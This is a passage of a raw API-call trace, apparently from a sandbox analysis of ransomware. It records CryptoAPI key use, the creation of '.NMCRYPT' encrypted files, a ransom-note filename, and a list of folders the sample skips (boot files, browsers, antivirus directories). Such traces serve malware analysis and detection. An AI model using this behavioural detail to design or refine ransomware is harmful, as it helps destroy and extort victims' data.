(_String="\\\\?\\") returned 0x4 [0143.241] CryptDuplicateKey (in: hKey=0x8be438, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7f9d4 | out: phKey=0x2d7f9d4*=0x8be3f8) returned 1 [0143.241] CreateFileW (lpFileName="\\\\?\\C:\\swapfile.sys.NMCRYPT" (normalized: "c:\\swapfile.sys.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x26c [0143.241] CreateFileW (lpFileName="\\\\?\\C:\\swapfile.sys" (normalized: "c:\\swapfile.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.242] CloseHandle (hObject=0x26c) returned 1 [0143.242] GetFileAttributesW (lpFileName="\\\\?\\C:\\swapfile.sys.NMCRYPT" (normalized: "c:\\swapfile.sys.nmcrypt")) returned 0x20 [0143.242] SetFileAttributesW (lpFileName="\\\\?\\C:\\swapfile.sys.NMCRYPT", dwFileAttributes=0x20) returned 1 [0143.242] PathFileExistsW (pszPath="\\\\?\\C:\\swapfile.sys.NMCRYPT") returned 1 [0143.242] DeleteFileW (lpFileName="\\\\?\\C:\\swapfile.sys.NMCRYPT" (normalized: "c:\\swapfile.sys.nmcrypt")) returned 1 [0143.242] CryptDestroyKey (hKey=0x8be3f8) returned 1 [0143.242] GetLastError () returned 0x20 [0143.242] wcslen (_String="Failed -> Cod 0x") returned 0x10 [0143.242] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.243] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.243] CryptDestroyKey (hKey=0x8be438) returned 1 [0143.243] CryptDestroyHash (hHash=0x8be2f8) returned 1 [0143.243] CryptReleaseContext (hProv=0x8becf8, dwFlags=0x0) returned 1 [0143.243] FindNextFileW (in: hFindFile=0x8c6b28, lpFindFileData=0x2d7fc1c | out: lpFindFileData=0x2d7fc1c) returned 1 [0143.243] wcscmp (_String1="System Volume Information", _String2=".") returned 1 [0143.243] wcscmp (_String1="System Volume Information", _String2="..") returned 1 [0143.243] wcslen (_String="\\") returned 0x1 [0143.243] wcslen (_String="System Volume Information") returned 0x19 [0143.243] FindNextFileW (in: hFindFile=0x8c6b28, lpFindFileData=0x2d7fc1c | out: lpFindFileData=0x2d7fc1c) returned 1 [0143.243] wcscmp (_String1="Users", _String2=".") returned 1 [0143.243] wcscmp (_String1="Users", _String2="..") returned 1 [0143.243] wcslen (_String="\\") returned 0x1 [0143.243] wcslen (_String="Users") returned 0x5 [0143.243] FindNextFileW (in: hFindFile=0x8c6b28, lpFindFileData=0x2d7fc1c | out: lpFindFileData=0x2d7fc1c) returned 1 [0143.243] wcscmp (_String1="Windows", _String2=".") returned 1 [0143.243] wcscmp (_String1="Windows", _String2="..") returned 1 [0143.243] wcslen (_String="\\") returned 0x1 [0143.243] wcslen (_String="Windows") returned 0x7 [0143.243] FindNextFileW (in: hFindFile=0x8c6b28, lpFindFileData=0x2d7fc1c | out: lpFindFileData=0x2d7fc1c) returned 0 [0143.243] GetLastError () returned 0x12 [0143.243] FindClose (in: hFindFile=0x8c6b28 | out: hFindFile=0x8c6b28) returned 1 [0143.244] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0143.244] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.244] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.244] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0143.244] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.244] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.244] wcslen (_String="\\\\?\\") returned 0x4 [0143.244] wcslen (_String="\\") returned 0x1 [0143.244] wcslen (_String="Target directory ") returned 0x11 [0143.244] wcslen (_String=" -> ") returned 0x4 [0143.244] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.244] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.244] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.244] wcslen (_String="\\*") returned 0x2 [0143.244] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*.exe") returned 0 [0143.244] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*.dll") returned 0 [0143.244] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*.lnk") returned 0 [0143.244] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*.bat") returned 0 [0143.244] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*.ini") returned 0 [0143.244] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*.msi") returned 0 [0143.244] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*.scf") returned 0 [0143.244] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*pagefile.sys*") returned 0 [0143.244] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*NTUSER.DAT*") returned 0 [0143.244] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*AppData*") returned 0 [0143.244] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*\\winrar\\*") returned 0 [0143.244] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.244] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*\\java\\*") returned 0 [0143.245] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0143.245] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*\\windows\\*") returned 0 [0143.245] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*\\ESET\\*") returned 0 [0143.245] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*\\AVG\\*") returned 0 [0143.245] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*\\AVIRA\\*") returned 0 [0143.245] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0143.245] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*Atheros*") returned 0 [0143.245] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*Realtek*") returned 0 [0143.245] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*bootmgr*") returned 0 [0143.245] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*boot*") returned 0 [0143.245] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*boot*") returned 0 [0143.245] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*CONFIG.SYS*") returned 0 [0143.245] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*IO.SYS*") returned 0 [0143.245] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*MSDOS.SYS*") returned 0 [0143.245] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*NTDETECT.COM*") returned 0 [0143.245] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*ntldr*") returned 0 [0143.245] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*chrome*") returned 0 [0143.245] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*opera*") returned 0 [0143.245] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\*", pszSpec="*firefox*") returned 0 [0143.245] wcslen (_String="\\\\?\\") returned 0x4 [0143.245] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\*", lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 0x8be4f8 [0143.245] wcscmp (_String1=".", _String2=".") returned 0 [0143.245] FindNextFileW (in: hFindFile=0x8be4f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.245] wcscmp (_String1="..", _String2=".") returned 1 [0143.245] wcscmp (_String1="..", _String2="..") returned 0 [0143.245] FindNextFileW (in: hFindFile=0x8be4f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.245] wcscmp (_String1="S-1-5-18", _String2=".") returned 1 [0143.245] wcscmp (_String1="S-1-5-18", _String2="..") returned 1 [0143.246] wcslen (_String="\\") returned 0x1 [0143.246] wcslen (_String="S-1-5-18") returned 0x8 [0143.246] FindNextFileW (in: hFindFile=0x8be4f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.246] wcscmp (_String1="S-1-5-21-1462094071-1423818996-289466292-1000", _String2=".") returned 1 [0143.246] wcscmp (_String1="S-1-5-21-1462094071-1423818996-289466292-1000", _String2="..") returned 1 [0143.246] wcslen (_String="\\") returned 0x1 [0143.246] wcslen (_String="S-1-5-21-1462094071-1423818996-289466292-1000") returned 0x2d [0143.246] FindNextFileW (in: hFindFile=0x8be4f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 0 [0143.246] GetLastError () returned 0x12 [0143.246] FindClose (in: hFindFile=0x8be4f8 | out: hFindFile=0x8be4f8) returned 1 [0143.246] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0143.246] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.246] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.246] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0143.246] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.246] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.246] wcslen (_String="\\\\?\\") returned 0x4 [0143.246] wcslen (_String="\\") returned 0x1 [0143.247] wcslen (_String="Target directory ") returned 0x11 [0143.247] wcslen (_String=" -> ") returned 0x4 [0143.247] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.247] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.247] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.247] wcslen (_String="\\*") returned 0x2 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*.exe") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*.dll") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*.lnk") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*.bat") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*.ini") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*.msi") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*.scf") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*pagefile.sys*") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*NTUSER.DAT*") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*AppData*") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*\\winrar\\*") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*\\java\\*") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*\\windows\\*") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*\\ESET\\*") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*\\AVG\\*") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*\\AVIRA\\*") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*Atheros*") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*Realtek*") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*bootmgr*") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*boot*") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*boot*") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*CONFIG.SYS*") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*IO.SYS*") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*MSDOS.SYS*") returned 0 [0143.247] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*NTDETECT.COM*") returned 0 [0143.248] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*ntldr*") returned 0 [0143.248] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*chrome*") returned 0 [0143.248] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*opera*") returned 0 [0143.248] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-18\\*", pszSpec="*firefox*") returned 0 [0143.248] wcslen (_String="\\\\?\\") returned 0x4 [0143.248] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\*", lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 0x8be478 [0143.253] wcscmp (_String1=".", _String2=".") returned 0 [0143.253] FindNextFileW (in: hFindFile=0x8be478, lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 1 [0143.253] wcscmp (_String1="..", _String2=".") returned 1 [0143.253] wcscmp (_String1="..", _String2="..") returned 0 [0143.253] FindNextFileW (in: hFindFile=0x8be478, lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 1 [0143.253] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*NMCRYPT") returned 0 [0143.253] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*Recovers your files.html") returned 0 [0143.253] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.exe") returned 0 [0143.253] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.dll") returned 0 [0143.253] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.lnk") returned 0 [0143.253] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.bat") returned 0 [0143.253] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.ini") returned 1 [0143.253] FindNextFileW (in: hFindFile=0x8be478, lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 0 [0143.253] GetLastError () returned 0x12 [0143.253] FindClose (in: hFindFile=0x8be478 | out: hFindFile=0x8be478) returned 1 [0143.253] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0143.253] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.253] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.253] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0143.253] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.253] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.253] wcslen (_String="\\\\?\\") returned 0x4 [0143.254] wcslen (_String="\\") returned 0x1 [0143.254] wcslen (_String="Target directory ") returned 0x11 [0143.254] wcslen (_String=" -> ") returned 0x4 [0143.254] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.254] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.254] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.254] wcslen (_String="\\*") returned 0x2 [0143.254] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*.exe") returned 0 [0143.254] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*.dll") returned 0 [0143.254] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*.lnk") returned 0 [0143.254] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*.bat") returned 0 [0143.254] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*.ini") returned 0 [0143.254] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*.msi") returned 0 [0143.254] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*.scf") returned 0 [0143.254] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*pagefile.sys*") returned 0 [0143.254] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*NTUSER.DAT*") returned 0 [0143.254] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*AppData*") returned 0 [0143.254] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*\\winrar\\*") returned 0 [0143.254] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.254] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*\\java\\*") returned 0 [0143.254] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0143.254] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*\\windows\\*") returned 0 [0143.254] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*\\ESET\\*") returned 0 [0143.254] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*\\AVG\\*") returned 0 [0143.254] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*\\AVIRA\\*") returned 0 [0143.254] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0143.254] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*Atheros*") returned 0 [0143.254] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*Realtek*") returned 0 [0143.254] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*bootmgr*") returned 0 [0143.254] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*boot*") returned 0 [0143.255] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*boot*") returned 0 [0143.255] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*CONFIG.SYS*") returned 0 [0143.255] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*IO.SYS*") returned 0 [0143.255] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*MSDOS.SYS*") returned 0 [0143.255] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*NTDETECT.COM*") returned 0 [0143.255] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*ntldr*") returned 0 [0143.255] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*chrome*") returned 0 [0143.255] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*opera*") returned 0 [0143.255] PathMatchSpecW (pszFile="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", pszSpec="*firefox*") returned 0 [0143.255] wcslen (_String="\\\\?\\") returned 0x4 [0143.255] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 0x8be778 [0143.255] wcscmp (_String1=".", _String2=".") returned 0 [0143.255] FindNextFileW (in: hFindFile=0x8be778, lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 1 [0143.255] wcscmp (_String1="..", _String2=".") returned 1 [0143.255] wcscmp (_String1="..", _String2="..") returned 0 [0143.255] FindNextFileW (in: hFindFile=0x8be778, lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 1 [0143.255] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*NMCRYPT") returned 0 [0143.255] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*Recovers your files.html") returned 0 [0143.255] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.exe") returned 0 [0143.255] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.dll") returned 0 [0143.255] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.lnk") returned 0 [0143.255] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.bat") returned 0 [0143.255] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.ini") returned 1 [0143.255] FindNextFileW (in: hFindFile=0x8be778, lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 0 [0143.255] GetLastError () returned 0x12 [0143.255] FindClose (in: hFindFile=0x8be778 | out: hFindFile=0x8be778) returned 1 [0143.256] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0143.256] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.256] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.256] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0143.256] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.256] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.256] wcslen (_String="\\\\?\\") returned 0x4 [0143.256] wcslen (_String="\\") returned 0x1 [0143.256] wcslen (_String="Target directory ") returned 0x11 [0143.256] wcslen (_String=" -> ") returned 0x4 [0143.256] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.256] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.256] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.256] wcslen (_String="\\*") returned 0x2 [0143.256] PathMatchSpecW (pszFile="C:\\Boot\\*", pszSpec="*.exe") returned 0 [0143.256] PathMatchSpecW (pszFile="C:\\Boot\\*", pszSpec="*.dll") returned 0 [0143.256] PathMatchSpecW (pszFile="C:\\Boot\\*", pszSpec="*.lnk") returned 0 [0143.256] PathMatchSpecW (pszFile="C:\\Boot\\*", pszSpec="*.bat") returned 0 [0143.256] PathMatchSpecW (pszFile="C:\\Boot\\*", pszSpec="*.ini") returned 0 [0143.256] PathMatchSpecW (pszFile="C:\\Boot\\*", pszSpec="*.msi") returned 0 [0143.256] PathMatchSpecW (pszFile="C:\\Boot\\*", pszSpec="*.scf") returned 0 [0143.256] PathMatchSpecW (pszFile="C:\\Boot\\*", pszSpec="*pagefile.sys*") returned 0 [0143.256] PathMatchSpecW (pszFile="C:\\Boot\\*", pszSpec="*NTUSER.DAT*") returned 0 [0143.256] PathMatchSpecW (pszFile="C:\\Boot\\*", pszSpec="*AppData*") returned 0 [0143.256] PathMatchSpecW (pszFile="C:\\Boot\\*", pszSpec="*\\winrar\\*") returned 0 [0143.256] PathMatchSpecW (pszFile="C:\\Boot\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.256] PathMatchSpecW (pszFile="C:\\Boot\\*", pszSpec="*\\java\\*") returned 0 [0143.256] PathMatchSpecW (pszFile="C:\\Boot\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0143.257] PathMatchSpecW (pszFile="C:\\Boot\\*", pszSpec="*\\windows\\*") returned 0 [0143.257] PathMatchSpecW (pszFile="C:\\Boot\\*", pszSpec="*\\ESET\\*") returned 0 [0143.257] PathMatchSpecW (pszFile="C:\\Boot\\*", pszSpec="*\\AVG\\*") returned 0 [0143.257] PathMatchSpecW (pszFile="C:\\Boot\\*", pszSpec="*\\AVIRA\\*") returned 0 [0143.257] PathMatchSpecW (pszFile="C:\\Boot\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0143.257] PathMatchSpecW (pszFile="C:\\Boot\\*", pszSpec="*Atheros*") returned 0 [0143.257] PathMatchSpecW (pszFile="C:\\Boot\\*", pszSpec="*Realtek*") returned 0 [0143.257] PathMatchSpecW (pszFile="C:\\Boot\\*", pszSpec="*bootmgr*") returned 0 [0143.257] PathMatchSpecW (pszFile="C:\\Boot\\*", pszSpec="*boot*") returned 1 [0143.257] wcslen (_String="Stopping because of filters: ") returned 0x1d [0143.257] wcslen (_String="*boot*") returned 0x6 [0143.257] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.257] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.257] wcslen (_String="\\\\?\\") returned 0x4 [0143.257] wcslen (_String="\\") returned 0x1 [0143.257] wcslen (_String="Target directory ") returned 0x11 [0143.257] wcslen (_String=" -> ") returned 0x4 [0143.257] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.257] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.257] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.257] wcslen (_String="\\*") returned 0x2 [0143.257] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*.exe") returned 0 [0143.257] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*.dll") returned 0 [0143.257] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*.lnk") returned 0 [0143.257] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*.bat") returned 0 [0143.257] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*.ini") returned 0 [0143.257] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*.msi") returned 0 [0143.257] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*.scf") returned 0 [0143.257] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*pagefile.sys*") returned 0 [0143.257] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*NTUSER.DAT*") returned 0 [0143.257] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*AppData*") returned 0 [0143.257] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*\\winrar\\*") returned 0 [0143.257] PathMatchSpecW (pszFile="C:\\Documents and 